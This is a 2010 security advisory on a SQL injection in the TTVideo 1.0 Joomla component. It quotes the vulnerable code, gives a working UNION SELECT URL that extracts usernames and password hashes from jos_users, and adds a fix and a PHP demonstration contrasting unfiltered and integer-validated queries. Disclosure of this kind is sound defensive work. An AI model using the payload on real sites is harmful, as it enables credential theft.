TTVideo 1.0 Joomla Component SQL Injection Vulnerability

Download link: http://www.toughtomato.com/resources/downloads/joomla-1.5/components/ttvideo/

Name: TTVideo
Vendor: http://www.toughtomato.com
Versions Affected: 1.0

Author: Salvatore Fresta aka Drosophila
Website: http://www.salvatorefresta.net
Contact: salvatorefresta [at] gmail [dot] com
Date: 2010-07-27
X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION________________________
TTVideo is a Joomla! component that makes use of the popular video sharing site Vimeo to create a video library.
II. DESCRIPTION_______________
A parameter in ttvideo.php is not properly sanitised before being used in a SQL query.
III. ANALYSIS_____________
Summary:
A) SQL Injection
A) SQL Injection________________
The parameter cid passed to ttvideo.php when task is set to video is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following is the vulnerable code:

ttvideoController.php (line 40):

  function video() {
    // 'default' filtering leaves cid as an arbitrary string
    $cid = JRequest::getVar('cid', null, 'default');
    // ... remainder of the method not reproduced in the advisory
  }
ttvideo.php (line 188):
  function getVideo($id) {
    $db = $this->getDBO();
    // $id is interpolated into the query unfiltered
    $db->setQuery("SELECT * from #__ttvideo WHERE id=$id");
    $video = $db->loadObject();
    if ($video === null)
      JError::raiseError(500, 'Video with ID: '.$id.' not found.');
    return $video;
  }

IV. SAMPLE CODE_______________
A) SQL Injection
http://site/path/index.php?option=com_ttvideo&task=video&cid=-1 UNION SELECT 1,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17 FROM jos_users
V. FIX______
Use JRequest::getInt instead of JRequest::getVar when reading cid in ttvideoController.php, so that the value is reduced to an integer before it reaches the query in getVideo().
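The following standalone PHP illustration is added here and is not the component's code or the advisory author's; it needs no Joomla install. It builds the same WHERE clause from an unfiltered cid (the vulnerable path above) and from an integer-validated cid (the fix), so the difference in the resulting query is visible. Joomla's JRequest::getInt coerces the value to an integer; the filter_var check used here is the stricter variant that rejects anything that is not a plain integer.

```php
<?php
// Added illustration for this advisory (not the TTVideo component's code).
// Mirrors the vulnerable path in ttvideo.php: the raw request value is
// interpolated into the SQL string exactly as received.
function buildQueryVulnerable(string $cid): string
{
    return "SELECT * FROM #__ttvideo WHERE id=$cid";
}

// Mirrors the advised fix: only a value that validates as an integer is
// accepted, so no SQL fragment can survive into the query. Returns null
// (no query at all) when the value is not an integer.
function buildQueryHardened(string $cid): ?string
{
    $id = filter_var($cid, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    return "SELECT * FROM #__ttvideo WHERE id=" . (int) $id;
}

// Constructed sample inputs: a legitimate id and a non-numeric cid of the
// shape shown in section IV (truncated, for illustration only).
$inputs = [
    '7',
    '-1 UNION SELECT 1,2',
];

foreach ($inputs as $cid) {
    printf("input:      %s\n", $cid);
    printf("vulnerable: %s\n", buildQueryVulnerable($cid));
    printf("hardened:   %s\n\n", buildQueryHardened($cid) ?? '(rejected, no query issued)');
}
```

Run with `php example.php`; the second input yields a query with the injected tail under the vulnerable builder and is rejected outright by the hardened one.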